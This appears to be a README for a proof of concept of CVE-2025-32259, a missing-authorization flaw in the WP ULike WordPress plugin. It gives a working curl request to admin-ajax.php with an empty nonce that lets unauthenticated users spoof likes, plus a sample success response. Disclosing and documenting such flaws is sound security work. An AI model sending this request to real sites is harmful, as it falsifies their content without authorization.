# WP ULike ≤ 4.7.9.1 - Unauthenticated Content Spoof (CVE-2025-32259)

> 🔬 A simple PoC demonstrating CVE-2025-32259 in the WP ULike plugin for WordPress.  
> 🚨 Educational use only – do not test on systems without explicit authorization.

---

## 🧠 Overview

WP ULike is a popular WordPress plugin that allows users to like content on a site. Versions up to 4.7.9.1 suffer from a **missing authorization vulnerability**, allowing unauthenticated users to spoof "like" actions via AJAX requests.

- **CVE:** [CVE-2025-32259](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-32259)
- **Vulnerable Versions:** ≤ 4.7.9.1
- **Fixed Version:** 4.7.9.2

---

## 🚀 Proof of Concept

The vulnerability allows unauthenticated users to interact with the AJAX endpoint and like any content (post, comment, etc.) without permission.

### 🔧 PoC Script

```bash
curl -X POST https://target-site.com/wp-admin/admin-ajax.php \
  -d "action=wp_ulike_process" \
  -d "method=likeThis" \
  -d "id=1" \
  -d "type=post" \
  -d "nonce=" \
  -H "Content-Type: application/x-www-form-urlencoded"

Replace id=1 with a valid post ID.

A successful response might look like:
{"status":"success","msg":"You liked this."}
